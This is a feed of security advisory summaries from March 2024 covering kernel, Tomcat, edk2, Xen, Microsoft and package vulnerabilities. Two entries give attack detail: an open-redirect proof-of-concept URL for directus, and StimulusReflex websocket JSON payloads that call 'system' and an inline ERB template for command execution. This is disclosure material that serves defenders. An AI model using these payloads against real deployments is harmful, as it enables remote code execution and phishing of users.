07.03.2024 02:00:00	cisa	[CISA-2024:0307] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0307
07.03.2024 02:00:00	oraclelinux	[ELSA-2024-1134] tomcat security update (important)	[1:9.0.62-37.el9_3.2]- Resolves: #2252050 HTTP request smuggling via malformed trailer headers (CVE-2023-46589)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1134
07.03.2024 02:00:00	oraclelinux	[ELSA-2024-1149] skopeo security update (moderate)	[2:1.13.3-4]- Rebuild with golang 1.20.12: golang:net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1149
07.03.2024 02:00:00	oraclelinux	[ELSA-2024-1150] buildah security update (moderate)	[1.31.4-1.0.1]- update to https://github.com/containers/buildah/releases/tag/v1.31- https://github.com/containers/buildah/commit/11bbf33	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1150
07.03.2024 02:00:00	vmware	[VMSA-2024-0007] VMware Cloud Director updates address a partial information disclosure vulnerability (CVE-2024-22256). (moderate)		https://secdb.nttzen.cloud/security-advisory/vmware/VMSA-2024-0007
07.03.2024 02:00:00	oraclelinux	[ELSA-2024-0461] kernel security update (important)	[5.14.0-362.18.1.el9_3.OL9]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5.el9- Remove nmap references from kernel (Mridula Shastry) [Orabug: 34313944]- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]- Disable unified kernel image package build- Add Oracle Linux IMA certificates[5.14.0]- Debranding patches copied from Rocky Linux (Louis Abel and Sherif Nagy from RESF)[5.14.0-362.18.1.el9_3]- nfp: fix use-after-free in area_cache_get() (Ricardo Robaina) [RHEL-19456 RHEL-19536 RHEL-6566 RHEL-7241] {CVE-2022-3545}- rtla: Fix uninitialized variable found (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat: Do not stop user-space if a cpu is offline (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat_aa: Fix previous IRQ delay for IRQs that happens after thread sample (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat_aa: Fix negative IRQ delay (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat_aa: Zero thread sum after every sample analysis (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat_hist: Add timerlat user-space support (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat_top: Add timerlat user-space support (John Kacur) [RHEL-18360 RHEL-10079]- rtla/hwnoise: Reduce runtime to 75% (John Kacur) [RHEL-18360 RHEL-10079]- rtla: Start the tracers after creating all instances (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat_hist: Add auto-analysis support (John Kacur) [RHEL-18360 RHEL-10079]- rtla/timerlat: Give timerlat auto analysis its own instance (John Kacur) [RHEL-18360 RHEL-10079]- rtla: Automatically move rtla to a house-keeping cpu (John Kacur) [RHEL-18360 RHEL-10079]- rtla: Change monitored_cpus from char * to cpu_set_t (John Kacur) [RHEL-18360 RHEL-10079]- rtla: Add --house-keeping option (John Kacur) [RHEL-18360 RHEL-10079]- rtla: Add -C cgroup support (John Kacur) [RHEL-18360 RHEL-10079]- ata: ahci: Add Intel Alder Lake-P AHCI controller to low power chipsets list (Tomas Henzl) [RHEL-19394 RHEL-10941]- fbcon: set_con2fb_map needs to set con2fb_map! (Jocelyn Falempe) [RHEL-1106 RHEL-1109 RHEL-12930 RHEL-13899] {CVE-2023-38409}- fbcon: Fix error paths in set_con2fb_map (Jocelyn Falempe) [RHEL-1106 RHEL-1109 RHEL-12930 RHEL-13899] {CVE-2023-38409}- net: tun: fix bugs for oversize packet when napi frags enabled (Ricardo Robaina) [RHEL-12495 RHEL-12496 RHEL-7186 RHEL-7264] {CVE-2023-3812}- netfilter: nf_tables: skip immediate deactivate in _PREPARE_ERROR (Florian Westphal) [RHEL-10536 RHEL-10538 RHEL-10537 RHEL-10539] {CVE-2023-4015}- md: Put the right device in md_seq_next (Nigel Croxon) [RHEL-16363 RHEL-12455]- dpll: sanitize possible null pointer dereference in dpll_pin_parent_pin_set() (Michal Schmidt) [RHEL-19677 RHEL-19095] {CVE-2023-6679}- dpll: Fix potential msg memleak when genlmsg_put_reply failed (Michal Schmidt) [RHEL-19677 RHEL-19095] {CVE-2023-6679}- Bluetooth: L2CAP: Fix use-after-free in l2cap_sock_ready_cb (Bastien Nocera) [RHEL-19003 RHEL-2717] {CVE-2023-40283}- tcp: enforce receive buffer memory limits by allowing the tcp window to shrink (Felix Maurer) [RHEL-16129 RHEL-11592]- tcp: adjust rcv_ssthresh according to sk_reserved_mem (Felix Maurer) [RHEL-16129 RHEL-11592]- md: raid0: account for split bio in iostat accounting (Nigel Croxon) [RHEL-4082 RHEL-2718]- can: af_can: fix NULL pointer dereference in can_rcv_filter (Ricardo Robaina) [RHEL-19465 RHEL-19526 RHEL-6428 RHEL-7052] {CVE-2023-2166}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0461
07.03.2024 00:37:10	ubuntu	[USN-6681-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-1
07.03.2024 00:23:11	ubuntu	[USN-6680-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6680-1
07.03.2024 19:23:56	maven	[MAVEN:GHSA-P2GX-4434-PF6G] Apache InLong: Logged-in user could exploit an arbitrary file read vulnerability (high)	Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.8.0 through 1.10.0, the attackers can use the specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong's 1.11.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/9673	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P2GX-4434-PF6G
07.03.2024 02:00:00	freebsd	[FREEBSD:E74DA31B-276A-4A22-9772-17DD42B97559] electron{27,28} -- vulnerability in libxml2 (high)	Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-25062.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:E74DA31B-276A-4A22-9772-17DD42B97559
07.03.2024 02:00:00	freebsd	[FREEBSD:B2CAAE55-DC38-11EE-96DC-001B217B3468] Gitlab -- Vulnerabilities (high)	Gitlab reports: Bypassing CODEOWNERS approval allowing to steal protected variables Guest with manage group access tokens can rotate and see group access token with owner permissions	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B2CAAE55-DC38-11EE-96DC-001B217B3468
07.03.2024 10:46:25	almalinux	[ALSA-2024:1134] tomcat security update (important)	tomcat security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1134
07.03.2024 21:03:21	almalinux	[ALSA-2024:1141] mysql security update (moderate)	mysql security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1141
07.03.2024 01:12:06	rubysec	[RUBYSEC:JSON-JWT-2023-51774] json-jwt allows bypass of identity checks via a sign/encryption confusion attack	The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allowsbypass of identity checks via a sign/encryption confusion attack.For example, JWE can sometimes be used to bypass JSON::JWT.decode.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:JSON-JWT-2023-51774
08.03.2024 18:36:49	suse	[SUSE-SU-2024:0825-1] Security update for cpio (moderate)	Security update for cpio	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0825-1
08.03.2024 18:34:54	suse	[SUSE-SU-2024:0824-1] Security update for cpio (moderate)	Security update for cpio	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0824-1
08.03.2024 13:06:14	suse	[SUSE-SU-2024:0820-1] Security update for python310 (important)	Security update for python310	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0820-1
08.03.2024 13:05:24	suse	[SUSE-SU-2024:0819-1] Security update for wpa_supplicant (important)	Security update for wpa_supplicant	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0819-1
08.03.2024 13:04:01	suse	[SUSE-SU-2024:0818-1] Security update for wpa_supplicant (important)	Security update for wpa_supplicant	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0818-1
08.03.2024 13:03:19	suse	[SUSE-SU-2024:0817-1] Security update for jetty-minimal (important)	Security update for jetty-minimal	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0817-1
08.03.2024 10:32:10	suse	[SUSE-SU-2024:0815-1] Security update for openssl-3 (moderate)	Security update for openssl-3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0815-1
08.03.2024 10:31:53	suse	[SUSE-SU-2024:0814-1] Security update for openssl-1_0_0 (moderate)	Security update for openssl-1_0_0	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0814-1
08.03.2024 10:31:37	suse	[SUSE-SU-2024:0813-1] Security update for openssl-1_1 (moderate)	Security update for openssl-1_1	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0813-1
08.03.2024 09:43:32	suse	[SUSE-SU-2024:0812-1] Security update for go1.22 (important)	Security update for go1.22	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0812-1
08.03.2024 09:43:13	suse	[SUSE-SU-2024:0811-1] Security update for go1.21 (important)	Security update for go1.21	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0811-1
08.03.2024 03:01:36	ubuntu	[USN-6680-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6680-2
08.03.2024 02:30:45	ubuntu	[USN-6686-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-1
08.03.2024 02:00:00	debian	[DSA-5637-1] squid (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5637-1
08.03.2024 02:00:00	oraclelinux	[ELSA-2024-1239] opencryptoki security update (moderate)	[3.21.0-9]- timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin)Resolves: RHEL-22792	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1239
08.03.2024 02:00:00	oraclelinux	[ELSA-2024-1075] edk2 security update (important)	[20230524-4.el9_3.2]- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45230-Pa.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Add-Unit-tests-to-CI-and-create-Host-Test.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45230-Un.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45229-Pa.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45229-Un.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45231-Patc.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45231-Unit.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45232-Patc.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Ip6Dxe-SECURITY-PATCH-CVE-2023-45232-Unit.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523p2.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523p3.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-UefiPxeBcDxe-SECURITY-PATCH-CVE-2023-4523p4.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Adds-a-SecurityFix.yaml-file.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Dhcp6Dxe-SECURITY-PATCH-CVE-2023-45229-Re.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Dhcp6Dxe-Removes-duplicate-check-and-repl.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Dhcp6Dxe-Packet-Length-is-not-updated-bef.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- edk2-NetworkPkg-Updating-SecurityFixes.yaml.patch [RHEL-21841 RHEL-21843 RHEL-21845 RHEL-21847 RHEL-21849 RHEL-21851 RHEL-21853]- Resolves: RHEL-21841 (CVE-2023-45229 edk2: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message [rhel-9])- Resolves: RHEL-21843 (CVE-2023-45230 edk2: Buffer overflow in the DHCPv6 client via a long Server ID option [rhel-9])- Resolves: RHEL-21845 (CVE-2023-45231 edk2: Out of Bounds read when handling a ND Redirect message with truncated options [rhel-9])- Resolves: RHEL-21847 (CVE-2023-45232 edk2: Infinite loop when parsing unknown options in the Destination Options header [rhel-9])- Resolves: RHEL-21849 (TRIAGE CVE-2023-45233 edk2: Infinite loop when parsing a PadN option in the Destination Options header [rhel-9])- Resolves: RHEL-21851 (CVE-2023-45234 edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message [rhel-9])- Resolves: RHEL-21853 (TRIAGE CVE-2023-45235 edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message [rhel-9])	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1075
10.03.2024 02:00:00	debian	[DSA-5638-1] libuv1 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5638-1
09.03.2024 02:00:00	freebsd	[FREEBSD:C2AD8700-DE25-11EE-9190-84A93843EB75] Unbound -- Denial-of-Service vulnerability (high)	NLNet Labs reports: Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C2AD8700-DE25-11EE-9190-84A93843EB75
11.03.2024 22:25:12	ubuntu	[USN-6681-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-2
11.03.2024 22:17:36	ubuntu	[USN-6688-1] Linux kernel (OEM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6688-1
11.03.2024 20:25:02	ubuntu	[USN-6658-2] libxml2 vulnerability (high)	libxml2 could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6658-2
11.03.2024 14:34:46	ubuntu	[USN-6687-1] AccountsService vulnerability (low)	AccountsService could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6687-1
11.03.2024 02:00:00	redhat	[RHSA-2024:1244] rhc-worker-script security update (moderate)	The rhc-worker-script packages provide Remote Host Configuration (rhc) worker for executing an interpreted programming language script on hosts managed by Red Hat Insights.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1244
10.03.2024 20:32:28	go	[GO-2024-2618] Authentication token leak in github.com/cloudevents/sdk-go/v2 (high)	Using cloudevents.WithRoundTripper to create a cloudevents.Client with anauthenticated http.RoundTripper causes the go-sdk to leak credentials toarbitrary endpoints. When the transport is populated with an authenticatedtransport, http.DefaultClient is modified with the authenticated transport andwill start to send Authorization tokens to any endpoint it is used to contact.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2618
10.03.2024 20:04:59	go	[GO-2024-2616] Path traversal and user privilege escalation ingithub.com/IceWhaleTech/CasaOS-UserService (high)	The UserService API contains a path traversal vulnerability that allows anattacker to obtain any file on the system, including the user database andsystem configuration. This can lead to privilege escalation and compromise ofthe system.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2616
10.03.2024 19:17:33	go	[GO-2024-2605] SQL injection in github.com/jackc/pgx/v4 (high)	SQL injection is possible when the database uses the non-default simpleprotocol, a minus sign directly precedes a numeric placeholder followed by astring placeholder on the same line, and both parameter values areuser-controlled.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2605
11.03.2024 13:17:25	almalinux	[ALSA-2024:1239] opencryptoki security update (moderate)	opencryptoki security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1239
12.03.2024 22:50:48	npm	[NPM:GHSA-FR3W-2P22-6W7P] URL Redirection to Untrusted Site in OAuth2/OpenID in directus (moderate)	### SummaryThe authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL https://docs.directus.io/reference/authentication.html#login-using-sso-providers /auth/login/google?redirect for example.### DetailsThere's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`, which I think is here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message "Your password needs to be updated" to phish out the current password.### PoCTurn on any auth provider in Directus instance. Form a link to `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, login and get taken to malicious-site. Tested on the `ory` OAuth2 integration.### ImpactUsers who login via OAuth2 into Directus.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FR3W-2P22-6W7P
12.03.2024 22:47:19	npm	[NPM:GHSA-2CCR-G2RV-H677] Session Token in URL in directus (low)	### ImpactWhen reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user.### Patches_Has the problem been patched? What versions should users upgrade to?_### WorkaroundsThere's no workaround available.### References_Are there any links users can visit to find out more?_	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2CCR-G2RV-H677
12.03.2024 20:42:27	ubuntu	[USN-6693-1] .NET vulnerability (high)	.NET could be made to crash if it processed specially crafted requests.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6693-1
12.03.2024 18:44:00	xen	[XSA-452] x86: Register File Data Sampling	ISSUE DESCRIPTIONIntel have disclosed RFDS, Register File Data Sampling, affecting someAtom cores.This came from internal validation work. There is no informationprovided about how an attacker might go about inferring data from theregister files.For more details, see: https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.htmlIMPACTAn attacker might be able to infer the contents of data held previouslyin floating point, vector and/or integer register files on the samelogical processor, including data from a more privileged context.Note: None of the vulnerable processors support HyperThreading, so there is no instantaneous exposure of data from other threads.VULNERABLE SYSTEMSSystems running all versions of Xen are affected.RFDS is only known to affect certain Atom processors from Intel. OtherIntel CPUs, and CPUs from other hardware vendors are not known to beaffected.RFDS affects Atom processors between the Goldmont and Gracemontmicroarchitectures. This includes Alder Lake and Raptor Lake hybridclient systems which have a mix of Gracemont and other types of cores.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-452
12.03.2024 18:44:00	xen	[XSA-453] GhostRace: Speculative Race Conditions	ISSUE DESCRIPTIONResearchers at VU Amsterdam and IBM Research have discovered GhostRace;an analysis of the behaviour of synchronisation primitives underspeculative execution.Synchronisation primitives are typically formed as an unbounded loopwhich waits until a resource is available to be accessed. This meansthere is a conditional branch which can be microarchitecturally bypassedusing Spectre-v1 techniques, allowing an attacker to speculativelyexecute critical regions.Therefore, while a critical region might be safe architecturally, it canstill suffer from data races under speculation with unsafe consequences.The GhostRace paper focuses on Speculative Concurrent Use-After-Freeissues, but notes that there are many other types of speculative datahazard to be explored.For more details, see: https://vusec.net/projects/ghostraceIMPACTAn attacker might be able to infer the contents of arbitrary hostmemory, including memory assigned to other guests.VULNERABLE SYSTEMSSystems running all versions of Xen are affected.GhostRace is a variation of Spectre-v1, and Spectre-v1 is known toaffect a wide range of CPU architectures and designs. Consult yourhardware vendor.However, Xen does not have any known gadgets vulnerable to GhostRace atthe time of writing.Furthermore, even with the vulnerable instance found in Linux, theresearchers had to insert an artificial syscall to make the instancemore accessible to a userspace attacker.Therefore, The Xen Security Team does not believe that immediate actionis required.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-453
12.03.2024 17:54:06	ubuntu	[USN-6692-1] Gson vulnerability (high)	Gson could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6692-1
12.03.2024 17:44:51	npm	[NPM:GHSA-F78J-4W3G-4Q65] StimulusReflex arbitrary method call (high)	### SummaryMore methods than expected can be called on reflex instances. Being able to call some of them has security implications.### DetailsTo invoke a reflex a websocket message of the following shape is sent:```json{ "target": "[class_name]#[method_name]", "args": [] }```The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`.It then attempts to call `method_name` on the instance with the provided arguments [ref](https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83):```rubymethod = reflex.method method_namerequired_params = method.parameters.select { \|(kind, _)\| kind == :req }optional_params = method.parameters.select { \|(kind, _)\| kind == :opt }if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size reflex.public_send(method_name, arguments)end```This is problematic as `reflex.method(method_name)` can be more methods than those explicitly specified by the developer in their reflex class. A good example is the `instance_variable_set` method.<details><summary>Read more</summary>Let's imagine a reflex that uses `@user` as a trusted variable in an `after_reflex` callback.This variable can be overwritten using the following message:```json{ "target": "ChatReflex#instance_variable_set", "args": ["@user", "<admin-id>"]}```Here are other interesting methods that were found to be available for the [ChatReflex sample reflex](https://github.com/hopsoft/stimulus_reflex_expo/blob/dcce8c36a6782d1e7f57f0e2766a3f6fd770b3b1/app/reflexes/chat_reflex.rb)- `remote_byebug`: bind a debugging server- `pry`: drop the process in a REPL sessionAll in all, only counting `:req` and `:opt` parameters helps.For example around [version 1.0](https://github.com/stimulusreflex/stimulus_reflex/blob/1f610b636abfed27de2c61104aebd1ac98180d5b/lib/stimulus_reflex/channel.rb#L41) only `.arity` was checked which allowed access to the `system` method (`.arity == -1`)```json{ "target": "ChatReflex#system", "args": ["[command here]"]}```Using `public_send` instead of `send` does not help but the following payloads do not* work since `:rest` parameters are not counted in the current version```json{ "target": "ChatReflex#send", "args": ["system", "[command here]"] }``````json{ "target": "ChatReflex#instance_eval", "args": ["system('[command here]')"]}```</details>Pre-versions of 3.5.0 added a `render_collection` method on reflexes with a `:req` parameter. Calling this method could lead to arbitrary code execution:```json{ "target": "StimulusReflex::Reflex#render_collection", "args": [ { "inline": "<% system('[command here]') %>" } ]}```### PatchesPatches are [available on RubyGems](https://rubygems.org/gems/stimulus_reflex) and on [NPM](https://npmjs.org/package/stimulus_reflex). The patched versions are: - [`3.4.2`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2)- [`3.5.0.rc4`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4)### WorkaroundYou can add this guard to mitigate the issue if running an unpatched version of the library. 1.) Make sure all your reflexes inherit from the `ApplicationReflex` class2.) Add this `before_reflex` callback to your `app/reflexes/application_reflex.rb` file:```rubyclass ApplicationReflex < StimulusReflex::Reflex before_reflex do ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1] allowed = ancestors.any? { \|a\| a.public_instance_methods(false).any?(method_name.to_sym) } raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed endend```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F78J-4W3G-4Q65
12.03.2024 16:18:08	ubuntu	[USN-6691-1] OVN vulnerability (medium)	OVN could be made to disrupt traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6691-1
12.03.2024 13:34:51	ubuntu	[USN-6690-1] Open vSwitch vulnerabilities (high)	Several security issues were fixed in Open vSwitch.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6690-1
12.03.2024 12:38:40	ubuntu	[USN-6656-2] PostgreSQL vulnerability (high)	PostgreSQL could be made to run arbitrary SQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6656-2
12.03.2024 12:22:55	ubuntu	[USN-6689-1] Rack vulnerabilities (medium)	Rack could be made do denial of service if it received a speciallycrafted header.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6689-1
12.03.2024 09:00:00	msrc	[MS:CVE-2024-20671] Microsoft Defender Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20671
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21392] .NET and Visual Studio Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21392
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21411] Skype for Consumer Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21411
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21418] Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21418
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21421] Azure SDK Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21421
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21426] Microsoft SharePoint Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21426
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21429] Windows USB Hub Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21429
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21430] Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21430
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21438] Microsoft AllJoyn API Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21438
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21439] Windows Telephony Server Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21439
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21441] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21441
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21442] Windows USB Print Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21442
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21443] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21443
